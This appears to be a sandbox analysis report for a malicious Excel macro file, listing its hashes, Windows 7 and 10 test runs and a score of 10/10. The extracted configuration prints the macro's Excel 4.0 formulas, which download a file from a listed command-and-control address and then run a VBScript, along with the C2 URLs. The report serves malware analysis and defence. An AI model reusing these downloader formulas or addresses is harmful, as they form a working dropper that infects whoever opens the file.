9f892f2d4296b46cd5653897b5d0ce23 | Triage

Submit
Reports

Overview

overview

Static

static

9f892f2d42...3.xlsm

windows7-x64

9f892f2d42...3.xlsm

windows10-2004-x64

Sharing

Copy URL Twitter E-mail

Static task

static1

Behavioral task

behavioral1

Sample

9f892f2d4296b46cd5653897b5d0ce23.xlsm

Resource

win7-20231215-en

windows7-x64

7 signatures

150 seconds

Behavioral task

behavioral2

Sample

9f892f2d4296b46cd5653897b5d0ce23.xlsm

Resource

win10v2004-20231215-en

windows10-2004-x64

7 signatures

150 seconds

General

Target

9f892f2d4296b46cd5653897b5d0ce23
Size

6KB
MD5

9f892f2d4296b46cd5653897b5d0ce23
SHA1

86f4452d09b8eb97a4ac201345011dd0ceda1959
SHA256

49128532185d57670871c975d49029eac46aee2ef8d2171b8796d5aa53a6e252
SHA512

41039454dd0db90041c6a6f851cb3a837a00deaee5eeea5fb732717c0bdd1b8e73434717ab60ae943a72d5121ddff75d5e7c8adc0445fbd7d7ca14e2047c64a9
SSDEEP

192:NDSFuS3brA2OmmfRq8UhHFBFYu0b98yNf+L:NOuAM2w41FYNb98yNM

Score

10^/10

xlm

Malware Config

Extracted

Rule

Excel 4.0 XLM Macro

C2

http://46.17.98.187/index.php

http://google.com/index.php

Attributes

formulas
=CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://46.17.98.187/index.php","C:\~\pes.msi",0,0) =CALL("Urlmon","URLDownloadToFileA","JJCCJJ",0,"http://google.com/index.php","C:\~\pes.msi",0,0) =EXEC("wscript C:\zer\spp.vbs") =HALT()

Signatures

Files

9f892f2d4296b46cd5653897b5d0ce23
.xlsm office2007

© 2018-2025

Terms | Privacy